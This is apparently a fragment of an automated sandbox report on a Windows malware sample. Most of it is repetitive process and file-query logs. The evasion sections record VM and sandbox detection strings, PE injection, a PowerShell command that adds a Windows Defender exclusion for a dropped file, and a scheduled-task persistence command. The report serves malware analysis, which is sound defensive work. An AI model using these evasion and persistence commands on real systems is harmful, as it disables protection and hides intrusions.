                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: 00000000.00000002.346224005.0000000002864000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe PID: 3984, type: MEMORYSTR
                Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.346224005.0000000002864000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.346224005.0000000002864000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
                Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe TID: 3808Thread sleep time: -43731s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe TID: 4400Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6948Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6812Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe TID: 6196Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe TID: 1036Thread sleep count: 4364 > 30Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe TID: 1036Thread sleep count: 3139 > 30Jump to behavior
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4615Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 512Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeWindow / User API: threadDelayed 4364Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeWindow / User API: threadDelayed 3139Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeThread delayed: delay time: 43731Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 0000000F.00000002.526245210.00000000010D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: SecuriteInfo.com.W32.AIDetectNet.01.20229.exe, 00000000.00000002.344442888.000000000260D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe base: 400000 value starts with: 4D5AJump to behavior
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HksvOcmoc.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HksvOcmoc.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HksvOcmoc.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HksvOcmoc" /XML "C:\Users\user\AppData\Local\Temp\tmpCB43.tmpJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetectNet.01.20229.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
